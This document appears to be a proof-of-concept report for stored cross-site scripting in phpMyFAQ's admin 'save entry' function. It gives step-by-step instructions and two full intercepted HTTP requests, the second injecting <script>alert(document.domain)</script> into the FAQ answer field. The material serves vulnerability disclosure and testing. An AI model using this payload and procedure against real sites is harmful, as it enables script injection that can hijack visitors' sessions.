Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
Step 1: Go to Add New FAQ
Step 2: Add a FAQ
Step 3: Intercept the request
POST /phpMyFAQ/phpmyfaq/admin/?action=saveentry&id=8 HTTP/1.1
Host: <DOMAIN>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 386
Origin: http://<DOMAIN>
Connection: close
Referer: http://<DOMAIN>/phpMyFAQ/phpmyfaq/admin/?action=editentry&id=8&lang=en
Cookie: pmf-csrf-token-4236a440a6=48fedc6db5f435fce1d85cfe3d3b1b70; pmf-csrf-token-43e075fa5c=b2ad7a1b9639067104816a3f7b2a30cd; pmf-csrf-token-bdeef9669c=96ee73555ec14bc08d8cc141f4a11fd3; pmf-csrf-token-b3e2016b52=f42fb10e3373e12018e31e160d6cf1a6; pmf_sid=13; phpmyfaq-setup=ckikio51e03n7njerqhffb0vr3; PHPSESSID=9maq1bft6opr9q02k7ft2v7qtb; phpmyfaq_cc_cookie={"categories":["necessary"],"level":["necessary"],"revision":0,"data":null,"rfc_cookie":false,"consent_date":"2023-04-10T08:02:28.700Z","consent_uuid":"88b3118d-69c6-41cb-bc18-18dca9e1ef90","last_consent_update":"2023-04-10T08:02:28.700Z"}
Upgrade-Insecure-Requests: 1
revision_id=0&record_id=8&openQuestionId=0&notifyUser=&notifyEmail=&pmf-csrf-token=3420181b6866cebb57dc3ad92503fdb3&question=test&answer=%3Cp%3Etest%3C%2Fp%3E&rubrik%5B%5D=1&lang=en&tags=&keywords=&author=admin&email=admin%40admin.com&grouppermission=all&userpermission=all&restricted_users=1&changed=&notes=&recordDateHandling=on&date=&active=yes&revision=no&comment=y&solution_id=1007
We can see the answer parameter: answer=%3Cp%3Etest%3C%2Fp%3E (URL-encoded <p>test</p>).
Change the value of the answer parameter to <script>alert(document.domain)</script>:
POST /phpMyFAQ/phpmyfaq/admin/?action=saveentry&id=8 HTTP/1.1
Host: <DOMAIN>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 404
Origin: http://<DOMAIN>
Connection: close
Referer: http://<DOMAIN>/phpMyFAQ/phpmyfaq/admin/?action=editentry&id=8&lang=en
Cookie: pmf-csrf-token-4236a440a6=48fedc6db5f435fce1d85cfe3d3b1b70; pmf-csrf-token-43e075fa5c=b2ad7a1b9639067104816a3f7b2a30cd; pmf-csrf-token-bdeef9669c=96ee73555ec14bc08d8cc141f4a11fd3; pmf-csrf-token-b3e2016b52=f42fb10e3373e12018e31e160d6cf1a6; pmf_sid=13; phpmyfaq-setup=ckikio51e03n7njerqhffb0vr3; PHPSESSID=9maq1bft6opr9q02k7ft2v7qtb; phpmyfaq_cc_cookie={"categories":["necessary"],"level":["necessary"],"revision":0,"data":null,"rfc_cookie":false,"consent_date":"2023-04-10T08:02:28.700Z","consent_uuid":"88b3118d-69c6-41cb-bc18-18dca9e1ef90","last_consent_update":"2023-04-10T08:02:28.700Z"}
Upgrade-Insecure-Requests: 1
revision_id=0&record_id=8&openQuestionId=0&notifyUser=&notifyEmail=&pmf-csrf-token=3420181b6866cebb57dc3ad92503fdb3&question=test&answer=<script>alert(document.domain)</script>&rubrik%5B%5D=1&lang=en&tags=&keywords=&author=admin&email=admin%40admin.com&grouppermission=all&userpermission=all&restricted_users=1&changed=&notes=&recordDateHandling=on&date=&active=yes&revision=no&comment=y&solution_id=1007
Step 4: Forward the FAQ request
Step 5: Go to the FAQ page
Step 6: XSS Triggered!